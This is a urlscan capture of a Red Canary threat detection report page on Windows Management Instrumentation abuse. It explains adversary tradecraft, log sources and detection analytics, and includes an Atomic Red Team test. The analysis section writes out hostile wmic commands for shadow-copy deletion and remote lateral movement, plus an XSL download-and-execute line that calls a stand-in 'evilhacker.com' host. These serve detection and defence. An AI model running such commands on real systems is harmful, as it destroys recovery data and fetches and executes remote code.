redcanary.com
Open in
urlscan Pro
104.198.136.223
Public Scan
URL:
https://redcanary.com/threat-detection-report/techniques/windows-management-instrumentation/
Submission: On August 31 via api from US — Scanned from DE
Submission: On August 31 via api from US — Scanned from DE
Form analysis 2 forms found in the DOM
GET /threat-detection-report/search/
<form method="get" class="sidenav-search" action="/threat-detection-report/search/" __bizdiag="-906336856" __biza="WJ__"> <input id="input-search" class="search-input" name="search" type="text" placeholder="Search" autocomplete="off"
autocorrect="off" autocapitalize="off" spellcheck="false"> <input type="submit" class="search-btn" value="Search"></form>GET https://redcanary.com/
<form method="get" class="search-form" action="https://redcanary.com/" __bizdiag="115" __biza="WJ__"> <svg width="20" height="19" viewBox="0 0 20 19" fill="none" xmlns="http://www.w3.org/2000/svg">
<line x1="12.8839" y1="12.1161" x2="18.8839" y2="18.1161" stroke="black" stroke-width="2.5"></line>
<circle cx="7.5" cy="7.5" r="6.25" stroke="black" stroke-width="2.5"></circle>
</svg> <input id="input-search" class="search-input" name="s" type="text" placeholder="Search" autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false"> <input type="submit" class="search-btn" value="Search"></form>Text Content
Skip Navigation
Now Available: Incident Response & Readiness Guide When Adversaries Come
Knocking, You'll Be Ready
Get a Demo
* Trends
* All trends
* Ransomware
* Initial access tradecraft
* Command and control frameworks
* Email threats
* Stealers
* Identity attacks
* Adversary emulation and testing
* Threats
* All threats
* Qbot
* Impacket
* AdSearch
* Gootloader
* Mimikatz
* SocGholish
* Raspberry Robin
* Cobalt Strike
* BloodHound
* Gamarue
* Yellow Cockatoo
* Emotet
* PlugX
* Techniques
* All techniques
* Windows Command Shell
* PowerShell
* Windows Management Instrumentation
* Obfuscated Files or Information
* Rundll32
* Ingress Tool Transfer
* Process Injection
* Service Execution
* Rename System Utilities
* LSASS Memory
* Modify Registry
* Gatekeeper Bypass
* Setuid and Setgid
* Mark-of-the-Web Bypass
* SMB/Windows Admin Shares
* Multi-Factor Authentication Request Generation
* Beats
* Archive
* Download Reports
* Abridged Report PDF
* Executive Summary
Download PDF
T1047
WINDOWS MANAGEMENT INSTRUMENTATION
Windows Management Instrumentation (WMI) held its place as the third most
prevalent threat Red Canary detected last year. Adversaries commonly abuse it to
move laterally, gather information, maintain persistence, and more.
Pairs with this song
#3
RANK
12.4%
PERCENT OF CUSTOMERS AFFECTED
897
TOTAL THREAT VOLUME
* Analysis
* Detection
* Testing
THREAT SOUNDS
Because Windows Management Instrumentation (WMI) is a native feature, malicious
activity often blends in with legitimate activity, enabling attacks that could
ultimately bust your Windows.
ANALYSIS
WHY DO ADVERSARIES USE WMI?
Like many of the threats highlighted in this report, WMI is a native Windows
feature that can be used on local or remote systems. Administrators regularly
use WMI to:
* configure systems
* execute processes or scripts
* automate tasks
What makes WMI useful to administrators also makes it attractive to adversaries.
Note that because WMI can carry out these tasks on both local and remote
systems, adversaries can use it for lateral movement. Furthermore, because WMI
is routinely used for benign purposes, malicious activity often blends in with
legitimate activity.
HOW DO ADVERSARIES USE WMI?
Adversaries use WMI to:
* move laterally
* gather information
* modify systems
* achieve persistence
Before delving deeper into how adversaries use WMI, understand that there are
client and server components that make up WMI. The most recognized clients are
the command-line utility wmic.exe (aka WMIC) and the PowerShell cmdlet
Get-WMIObject. Administrators and adversaries alike use both for the purposes
mentioned above. Because we observe wmic.exe far more often than Get-WMIObject,
the examples provided below will focus on the former. On the server side,
wmiprvse.exe—or the WMI Provider Host—services many, but not all, requests made
by clients. Note that WMIC is not the only client. There are a number of Windows
binaries that make WMI calls under the hood that are handled by
wmiprvse.exe—tasklist.exe is one example.
This is important to remember because if you’re looking at suspicious activity
that ties back to a parent process of wmiprvse.exe, you may be dealing with an
adversary who is using wmic.exe on a remote system to execute payloads on the
system you’re investigating—a form of lateral movement. Here is a WMI lateral
movement technique that we see often:
wmic.exe /node: process call create
On the destination host, the given process will appear as a child of
wmiprvse.exe. If your security audit policies are logging logon events, you
should see a corresponding network (type 3) logon event associated with this
activity. Variations of the above command line may include passed credentials.
Another common way adversaries use WMI, and WMIC specifically, is to gather
information and modify systems. During ransomware attacks, adversaries often
list and delete volume shadows, which are used to recover files. Because
ransomware operators frequently use the Volume Shadow Administration utility,
vssadmin.exe, for this purpose, many organizations send alerts to the SOC when
it executes. However, wmic.exe may also be used to manage volume shadows without
calling vssadmin.exe via a command like the following:
wmic shadowcopy delete /noninteractive
Ironically, we sometimes see a less than stealthy version of this attack using
WMIC:
wmic process call create vssadmin.exe delete shadows /all /quiet
The pattern above will cause wmiprvse.exe to spawn the vssadmin.exe process.
In addition to enumerating and manipulating volume shadows, adversaries use WMIC
to enumerate and modify dozens of aspects of a Windows system or environment.
We’ve seen adversaries use WMIC to:
* determine what antivirus product may be installed
* stop the firewall service
* enumerate group membership (including local and in many configurations,
domain administrator accounts)
* modify dozens more items of interest
We’ve also run into adversaries leveraging XSL Script Processing, which can be
used to bypass application control and—courtesy of WMIC’s /format
option—download code from a remote location. Here’s an example of what this can
look like:
wmic os get /FORMAT:"http://evilhacker.com/attacker.xsl"
When the above command is run, it will download and execute the contents of the
XSL file.
Adversaries also use WMI for persistence via the trio of WMI event consumers,
filters, and filter-to-consumer bindings. Adversaries use this persistence
mechanism to execute arbitrary code in response to activity on the endpoint such
as a user logging in or out or a file being written to a specified path.
Regardless of whether it’s a single endpoint, an endpoint in an Active Directory
domain, or an Azure VM, the WMI service will be running and available to
adversaries who have already compromised an endpoint or identity.
ASSOCIATED THREATS
* CrackMapExec
* Impacket
* Mimikatz
* Dumpert
* Cobalt Strike
TAKE ACTION
There’s no simple strategy for limiting the effectiveness of adversarial abuse
of WMI. As is often the case with techniques that are common Windows utilities
or processes, the nuclear option of disabling the Winmgmt service is not
recommended because legitimate code often relies upon WMI. Therefore blocking it
would break untold numbers of things in unexpected ways.
WMI namespaces are also securable objects, and while administrators can further
restrict use, remote WMI access requires administrator privileges by default, so
it’s already in a reasonably locked down state. Generally speaking, security
teams should focus on collecting the right kinds of telemetry—AMSI being among
the best sources—and developing methods of reliably detecting WMI abuse rather
than hoping to mitigate WMI abuse altogether.
VISIBILITY
Note: The visibility sections in this report are mapped to MITRE ATT&CK data
sources and components.
Our most fruitful detection analytics for catching adversarial abuse of WMI rely
almost entirely on a mix of process and command-line monitoring, which are
widely available via commercial EDR products and native Windows event logging.
PROCESS MONITORING
Processes serve as the basis for most of our WMI detection analytics. Unlike
many other techniques, malicious use of WMI typically manifests as one of two
processes: wmic.exe or wmiprvse.exe. In fact, much of the actual behavior
associated with WMI will spawn from wmiprivse.exe. For example, if an adversary
calls the Create method of the Win32_Process class in order to perform lateral
movement, the executable will spawn as a child process of wmiprvse.exe on the
target system.
A potentially suspicious child process of wmiprvse.exe is scrcons.exe, the
script host executable responsible for executing VBScript and JScript code when
the ActiveScriptEventConsumer class is leveraged for persistence. While it may
be used in limited cases for legitimate purposes, scrcons.exe execution should
be monitored for suspicious child process creation.
COMMAND MONITORING
While we have some analytics that are primarily built around process lineage,
many look for a combination of processes and command-line arguments. The
Get-WMIObject PowerShell cmdlet stands out as a particularly useful parameter
for observing WMI activity.
COLLECTION
Note: The collection sections of this report showcase specific log sources from
Windows events, Sysmon, and elsewhere that you can use to collect relevant
security information.
WINDOWS EVENT ID 4688: PROCESS CREATION
As with many other attack techniques, logging process start events (4688) with
command-line logging enabled can be a rich source of telemetry. More abstractly,
Event ID 4688 is a great place—readily available on Windows systems—to observe
WMI and other activity and start differentiating normal and benign from abnormal
and suspicious.
SYSMON EVENT IDS 19, 20, AND 21: WMIEVENTS
Sysmon provides specific WMI event codes (e.g., 19: WmiEventFilter activity
detected, 20: WmiEventConsumer activity detected, and 21:
WmiEventConsumerToFilter activity detected) that are useful for observing
malicious use of WMI. If enabled, Sysmon logs permanent WMI subscriptions in the
Microsoft-Windows-Sysmon/Operational event log using Event IDs 19, 20, and 21
for event filter creation, event consumer creation, and
filter-to-consumer-binding creation, respectively. Legitimate software
occasionally leverages these features of WMI, but they do so infrequently and
are easy to monitor for malicious use.
WINDOWS EVENT ID 5861: MICROSOFT-WINDOWS-WMI-ACTIVITY/OPERATIONAL
Event ID 5861 in the Microsoft-Windows-WMI-Activity/Operational event log
reliably logs permanent WMI event subscriptions. A permanent event subscription
is the primary means by which an adversary can achieve persistence using WMI.
This persistence mechanism offers an adversary a tremendous amount of control
over the conditions in which their payload is executed.
ANTIMALWARE SCAN INTERFACE (AMSI) TELEMETRY
Endpoint security solutions that consume AMSI event data will receive AMSI
events related to WMI tradecraft, including lateral movement attempts and
permanent WMI event subscriptions. AMSI can also be useful for detecting
malicious use of PowerShell’s Get-WMIObject cmdlet.
ENDPOINT DETECTION AND RESPONSE (EDR) TOOLS
A good EDR product will provide detailed visibility into all of the data sources
referenced above and offer great value to security teams seeking to detect
adversaries abusing Windows Management Instrumentation.
DETECTION OPPORTUNITIES
We have more than 96 detection analytics that look for malicious and suspicious
WMI activity. The following detection opportunities are a synthesis of some of
our most effective analytics.
Note: These detection analytics may require tuning.
SUSPICIOUS PROCESS LINEAGE
In general, trusted binaries and known administrative tools and processes will
initiate WMI activity. As such, it makes sense to look for known bad processes
launching WMI or deviations from the expected where a legitimate but unusual
Windows binary spawns WMI—or spawns from it. The following is an amalgamation of
several analytics that can detect a wide array of threats, ranging from red team
activity to web shells to coinminers:
parent_process == wmiprvse.exe
&&
process == ('rundll32.exe' || 'msbuild.exe' || 'powershell.exe' || 'cmd.exe' || 'mshta.exe')
SUSPICIOUS COMMANDS
Looking for suspicious command-line parameters is another solid indicator of
malice. Certain red team and post-exploitation frameworks will spawn unique and
unsigned binaries or commands remotely using the well known process call create
command, and we’ve got a couple different detection methods that have alerted us
to related activity over the years. Potentially suspicious WMI command switches
include create, node:, process, and call. Of course, the maliciousness of these
commands are context-specific, and therefore, the following may require tuning
or generate high volumes of false positives:
process == wmic.exe
&&
command_includes ('create' || 'node:' || 'process' || 'call')
UNUSUAL MODULE LOADS
By monitoring and detecting on module loads, you can catch a variety of
different malicious activities, including defense evasion and credential theft.
In cases where an adversary is using WMI for credential theft, consider looking
for the execution of wmiprvse.exe (or its child processes) with unusual module
loads like samlib.dll or vaultcli.dll. WMI is also a useful vehicle for
bypassing application controls, and we commonly see adversaries—real and
simulated–using a WMI bypass method called “SquibblyTwo.” The following
pseudo-detection analytic is designed specifically to catch application control
bypasses, but you can likely adapt it to detect other threats by substituting in
a different DLL or by removing the command:
process == wmic.exe
&&
command_includes ('format:')
&&
module_load == ('jscript.dll' || 'vbscript.dll')
OFFICE PRODUCTS SPAWNING WMI:
It’s almost always malicious when wmic.exe spawns as a child process of
Microsoft Office and similar products. As such, it makes sense to examine the
chain of execution and follow-on activity when this occurs. The following is a
non-exhaustive example analytic that will catch some of this activity:
parent_process == ('winword.exe' || 'excel.exe')
&&
process == wmic.exe
WMI RECONNAISSANCE
Reconnaissance is harder to detect because it looks very similar to normal admin
behavior. Even so, we detect a relatively high volume of adversaries leveraging
WMI to quickly gather domain information such as users, groups, or computers in
the domain. The following may help you detect related activity:
process == wmic.exe
&&
command_includes ('\ldap' || 'ntdomain')
SHADOW COPY DELETION
It’s not uncommon for ransomware operators to leverage WMI to delete volume
shadows, significantly complicating the process for recovering access to
encrypted systems and files. If you want to detect ransomware using WMI to
delete shadow copies, consider looking for wmic.exe execution with command lines
including shadowcopy or delete.
process == wmic.exe
&&
command_includes ('shadowcopy' && 'delete')
SUSPICIOUS POWERSHELL CMDLETS
There are numerous default PowerShell cmdlets that allow administrators to
leverage WMI via PowerShell. Both adversaries and administrators use these
cmdlets to query the operating system or execute commands, either locally or
remotely. Cmdlets like Get-WMIObject are often used for reconnaissance.
process == powershell.exe
&&
command_includes ('invoke-wmimethod' || 'invoke-cimmethod' || 'get-wmiobject' || 'get-ciminstance' || 'wmiclass')
WEEDING OUT FALSE POSITIVES
Network flow logs and on-the-wire WMI traffic is commonly encrypted, so it will
blend in with other network traffic and could generate high volumes of false
negatives. This is yet another reason—along with minimal logging and defender
knowledge of WMI—for why adversaries love WMI. Authentication log monitoring for
WMI requires deep knowledge of accounts and typical user activity, which is
difficult for most security teams. Additionally, Windows authentication logs are
verbose, noisy, and not as easy to ingest into a SIEM or similar platform.
TESTING
Start testing your defenses against Windows Management Instrumentation using
Atomic Red Team—an open source testing framework of small, highly portable
detection tests mapped to MITRE ATT&CK.
GETTING STARTED
View atomic tests for T1047: Windows Management Instrumentation. In most
environments, these should be sufficient to generate a useful signal for
defenders.
RUN THIS TEST ON A WINDOWS SYSTEM USING COMMAND PROMPT:
wmic /node:"127.0.0.1" process call create “calc.exe”
USEFUL TELEMETRY WILL INCLUDE:
VisibilityTelemetryCollectionVisibility :
Process monitoring
Telemetry:
child processes of wmiprivse.exe
Collection :
EDR, Sysmon Event ID 1, and Windows Event ID 4688 should collect relevant
telemetry.
Visibility :
Command monitoring
Telemetry:
“process”, “create”
Collection :
EDR, Sysmon Event ID 1, and Windows Event ID 4688 should collect relevant
telemetry.
REVIEW AND REPEAT
Now that you have executed one or several common tests and checked for the
expected results, it’s useful to answer some immediate questions:
* Were any of your actions detected?
* Were any of your actions blocked or prevented
* Were your actions visible in logs or other defensive telemetry?
Repeat this process, performing additional tests related to this technique. You
can also create and contribute tests of your own.
SEE WHAT IT'S LIKE TO HAVE A SECURITY ALLY.
EXPERIENCE THE DIFFERENCE BETWEEN A SENSE OF SECURITY AND ACTUAL SECURITY.
Get a Demo
SEE WHAT IT'S LIKE TO HAVE A SECURITY ALLY.
EXPERIENCE THE DIFFERENCE BETWEEN A SENSE OF SECURITY AND ACTUAL SECURITY.
Get a Demo
*
*
*
* Products
* Managed Detection and Response (MDR)
* Readiness Exercises
* Linux EDR
* Atomic Red Team™
* Mac Monitor
* Solutions
* Deliver Enterprise Security Across Your IT Environment
* Get a 24×7 SOC Instantly
* Protect Your Corporate Endpoints and Network
* Protect Your Users’ Email, Identities, and SaaS Apps
* Protect Your Cloud
* Protect Critical Production Linux and Kubernetes
* Stop Business Email Compromise
* Replace Your MSSP or MDR
* Run More Effective Tabletops
* Train Continuously for Real-World Scenarios
* Operationalize Your Microsoft Security Stack
* Minimize Downtime with After-Hours Support
* Resources
* View all Resources
* Blog
* Integrations
* Guides & Overviews
* Case Studies
* Videos
* Webinars
* Events
* Customer Help Center
* Newsletter
* Partners
* Overview
* Incident Response
* Insurance & Risk
* Managed Service Providers
* Solution Providers
* Technology Partners
* Apply to Become a Partner
* Company
* About Us
* The Red Canary Difference
* News & Press
* Careers – We’re Hiring!
* Contact Us
* Trust Center and Security
© 2014-2023 Red Canary. All rights reserved. info@redcanary.com +1 855-977-0686
Privacy Policy Trust Center and Security
Our website uses cookies to provide you with a better browsing experience. More
information can be found in our Privacy Policy.
OK
Privacy & Cookies Policy
Close
PRIVACY OVERVIEW
This website uses cookies to improve your experience while you navigate through
the website. Out of these cookies, the cookies that are categorized as necessary
are stored on your browser as they are essential for the working of basic
functionalities...
Necessary
Necessary
Always Enabled
Necessary cookies are absolutely essential for the website to function properly.
This category only includes cookies that ensures basic functionalities and
security features of the website. These cookies do not store any personal
information.
Non-necessary
Non-necessary
Any cookies that may not be particularly necessary for the website to function
and is used specifically to collect user personal data via analytics, ads, other
embedded contents are termed as non-necessary cookies. It is mandatory to
procure user consent prior to running these cookies on your website.
SAVE & ACCEPT
Back to Top